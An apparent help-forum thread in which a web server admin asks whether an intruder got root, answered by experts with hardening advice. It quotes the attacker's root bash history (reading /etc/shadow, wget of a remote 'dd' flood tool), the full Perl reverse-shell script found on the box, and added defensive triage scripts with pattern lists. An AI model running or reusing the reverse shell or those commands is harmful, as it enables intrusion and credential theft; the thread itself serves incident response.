Linux: Possible root vulnerability, through url code injection

TSHAW
Hello, I've searched for my question and I found something similar in ID 21727726, but I have an extra problem. The hacker didn't just copy the "back" file to the /tmp directory; I also found in /root/.bash_history the following set of commands, which I didn't enter in any terminal on my server:

ifconfig
ifconfig -all
ifconfig ?
ifconfig --help
man ifconfig
id
cd /etc
ls -la
cd yum
ls -la
cat /etc/shadow
wget http://ddmalfa.cz/_adm/dd
chmod 777 dd
./dd www.zone-h.org 53 127.0.0.66
./dd www.zone-h.org 53 127.0.0.66
./dd www.zone-h.org 53 127.0.0.66
./dd www.zone-h.org 53 127.0.0.66
./dd www.zone-h.org 53 127.0.0.66
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128

Apparently the hacker accessed my server as root (since that is the only way he could possibly have run the commands in a superuser terminal) and ran that set of commands, including the download of the dd script. I'm sure he didn't get in by entering the correct password, because he didn't change it and I've already searched the logs for ssh failures. I'm attaching a screenshot of the dd script code. If you need it I can send it to you.

We first noticed the attack because our site just became unreachable, and even through the FW we couldn't reach the servers. When I first accessed the server (physically) I just saw the "dd" process running at 100% of the CPU, so I proceeded to kill it. After that the server went back to normal, and so did the FW.

So my questions:
1.- Did he really access my server as root?
2.- If so, what do I have to do to protect it?


Thank you in advance
"back" code:
 
#!/usr/bin/perl
# Reverse shell: connects out to the host and port given on the command line
# and attaches /bin/sh to that socket, so the remote side gets a shell on this
# machine with whatever privileges the script was started with.
use Socket;
$cmd= "lynx";                                        # name to show in process listings
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';    # banner (kernel, uid), then a shell
$0=$cmd;                                             # disguise the process as "lynx" in ps
$target=$ARGV[0];                                    # attacker's host
$port=$ARGV[1];                                      # attacker's listening port
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");       # outbound connection, so inbound firewall rules do not block it
open(STDIN, ">&SOCKET");                             # duplicate the socket onto stdin/stdout/stderr
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);                                     # everything the shell reads/writes now goes over the socket
close(STDIN);
close(STDOUT);
close(STDERR);

DDOS.doc
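As a triage aid for a root history like the one above, here is an added shell script (not from this thread or any of its participants) that flags the command patterns seen there (remote download, chmod 777, reading /etc/shadow, executing from the current directory or /tmp) and reports the single most repeated command; in this case the same ./dd line was run nineteen times, which is the flood tool that pinned the CPU. The history lines in the test are constructed, and EXAMPLE-HOST and EXAMPLE-TARGET are placeholders.

```shell
#!/bin/sh
# Added example (not from the thread): triage a shell history file such as
# /root/.bash_history for the command patterns that appeared above.

# scan_history FILE
#   Prints "rule<TAB>command" for every line that matches one of the patterns
#   and returns 1 if anything matched, 0 if the history looks clean.
scan_history() {
    hist="$1"
    hits=0
    while IFS= read -r line || [ -n "$line" ]; do
        rule=""
        case "$line" in
            *wget\ *http*|*curl\ *http*)             rule="remote-download" ;;
            *chmod\ 777*|*chmod\ +x*|*chmod\ a+x*)   rule="make-executable" ;;
            *cat\ /etc/shadow*|*cat\ /etc/gshadow*)  rule="credential-read" ;;
            ./*|/tmp/*|*\ /tmp/*)                    rule="cwd-or-tmp-path" ;;
        esac
        if [ -n "$rule" ]; then
            printf '%s\t%s\n' "$rule" "$line"
            hits=$((hits + 1))
        fi
    done < "$hist"
    [ "$hits" -eq 0 ]
}

# most_repeated FILE
#   Prints "count<TAB>command" for the most repeated line. A command run
#   dozens of times in a row (like ./dd above) is a flood tool, not admin work.
most_repeated() {
    sort "$1" | uniq -c | sort -rn |
        awk 'NR == 1 { c = $1; $1 = ""; sub(/^ +/, ""); print c "\t" $0 }'
}

# Usage: sh triage_history.sh /root/.bash_history
if [ -n "${1:-}" ]; then
    scan_history "$1"
    printf 'most repeated: %s\n' "$(most_repeated "$1")"
fi
```

Run it against a copy of the history taken before the box is rebuilt; the patterns are deliberately broad, so review every hit rather than treating the list as a verdict.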
do you probably have vulnerable web applications on that server?
Top Expert 2009
Commented:
What's this server for? A webserver?

First of all, I will tell you to remove this server from production, break it and then install a new OS again.

Cause: when someone entered the server (by whatever means) they might have opened some back door, so even if you delete those files, it will still be infected again.


"I'm sure he didn't accessed by putting the correct password, because he didn't changed it and I've already search in the logs for ssh failures"

That's true. They don't have to change the password!! They can put some hidden script in place and it will make an open door for them to come in any time!! And if a server is hacked, the /var/log/secure log is useless, because that's the place they will hack first, and they will delete any entry related to their hacking...

If you use a syslog server to remotely copy all the logs to another server, then you could have noticed whether it has been accessed by someone or not. Other than that it's just useless.


1. Reinstall your server.
2. Put all the data back from backup, but make sure those backups have not been tampered with by anyone.
3. Use a strong firewall to protect your server.
4. Use iptables and only allow certain traffic to your server.
5. Use portsentry (a free but really good piece of software) to secure your server.
6. Use fail2ban.
7. If this server is a webserver, don't allow direct traffic to this server; use a reverse proxy and then from the reverse proxy allow http connections to this server.
8. Use mod_security to protect your apache.
9. Make sure apache is not running as the root user.


These are the basic things you can do if you don't want to pay for commercial security software...





> 1. Reinstall your server.
FULL ACK
:)



> 8. use mod security to protect your apache
hmm, mod_security can protect your application, but it can protect apache only partially;
remember that mod_security is a module inside apache

Author

Commented:
1.- This server is a webserver (web application).
2.- This server is behind a Juniper Netscreen firewall; all the ports are protected, the only one that is open is 80 and it's redirected to the server through a VIP service.
3.- The servers are not directly reachable via ssh, ftp or telnet from the internet. I have a VPN from my office to administer them, with local IP addresses.
4.- Apache is not running as root.

I think that it is difficult to access the server directly considering the above. So maybe the hacker really accessed my server through some vulnerability of the web application, isn't it?
If your server (httpd process) is not running as root, and the default server (that part which is served as user root) is not accessible, then there are only 2 possibilities left:
  1. the web server (apache httpd here) itself has a vulnerability
  2. one of the applications uses/calls an external program which can get root access

Do you have any hints in your access_log or error_log?
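To check the split ahoffmann describes (the httpd parent may run as root only to bind the port; every child that serves requests must be unprivileged), here is an added shell script, not from the thread or any of its participants, that reads a `ps -eo user,pid,ppid,comm` listing and flags any httpd process whose parent is also httpd but which runs as root. The process listing in the test is constructed.

```shell
#!/bin/sh
# Added example (not from the thread): audit which user each Apache process
# runs as. Input is the output of:  ps -eo user,pid,ppid,comm
# The parent (listener) legitimately runs as root to bind port 80; every child
# that serves requests must run as an unprivileged user such as nobody.

# audit_httpd FILE [PROCESS_NAME]
#   Prints one line per httpd process and returns 1 if any worker runs as root.
audit_httpd() {
    awk -v name="${2:-httpd}" '
        # keep only rows for the web server binary; $2 must look like a pid
        $4 == name && $2 ~ /^[0-9]+$/ { user[$2] = $1; ppid[$2] = $3 }
        END {
            bad = 0
            for (p in user) {
                if (ppid[p] in user) {
                    # parent is httpd too, so this is a request-serving worker
                    if (user[p] == "root") {
                        printf "WARNING worker pid %s runs as root\n", p
                        bad++
                    } else {
                        printf "ok worker pid %s runs as %s\n", p, user[p]
                    }
                } else {
                    printf "listener pid %s runs as %s\n", p, user[p]
                }
            }
            exit (bad > 0)
        }' "$1"
}

# Usage: ps -eo user,pid,ppid,comm > /tmp/ps.txt && sh audit_httpd.sh /tmp/ps.txt
#        (pass apache2 as the second argument on Debian-style systems)
if [ -n "${1:-}" ]; then
    audit_httpd "$1" "${2:-httpd}"
fi
```

A root listener with non-root workers is the normal picture; a root worker means the User/Group directives are not taking effect for that process and the web application is effectively running as root.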
Top Expert 2009

Commented:
In the scenario you are describing, it looks like it was done via the web server...

What kind of website is your server hosting? Does any website need to play with the Linux file system or something like that?
What I meant is, does any website have any ability to modify the Linux file system for any kind of purpose, or anything?


Is your apache up to date? Is your Linux server up to date?

Author

Commented:
ahoffmann:

1.- The apache child processes are running as nobody, but indeed the default server is running as root. So what do I have to do to be sure this default server (running as root) is not accessible?
2.- I've already looked at the access_log and error_log and I didn't see anything wrong.

fosiul01:

1.- My web site is an AVL (automatic vehicle location) system developed in PHP. As far as I can remember there isn't any part of the website that accesses the Linux file system. I do have some PHP scripts that run via the CLI, but those scripts are not accessible from the web (these PHP scripts do play with the Linux file system).
2.- We are updating apache and linux right now (to tell you the truth we didn't update them for a while).

note: We just decided to run apache on a higher port (1030), so the FW does the translation from 80 to 1030, and to use a user called "webserver" to run apache. What do you think?
Top Expert 2009

Commented:
Update both Apache and Linux (but reinstall first). Don't update the same server; reinstall totally, then install again.

Put a firewall in place and install mod_security. Nowadays most companies use mod_security as an apache-level firewall.

Also use the reverse proxy concept; it will save your main server from 90% of hacks....

Also, since you have been hacked once!! keep all your logs on a different server which can't be accessed from outside. If any incident happens you will know how it happened.

As I said, the first thing hackers do is delete all the offending logs from the compromised server.
I feel sorry for TSHAW and this certainly seems to be a hard lesson..
Adding to the experts here:
If you are hacked once, you are going to be hacked again. So you have to be prepared. Before sending the server to production, do a vulnerability scan on the server (you can use WebInspect or Nikto, there are lots out there).
Once that is done, along with the experts' suggestions, deploy. A syslog server would also help so that your webserver can direct its logs to it.
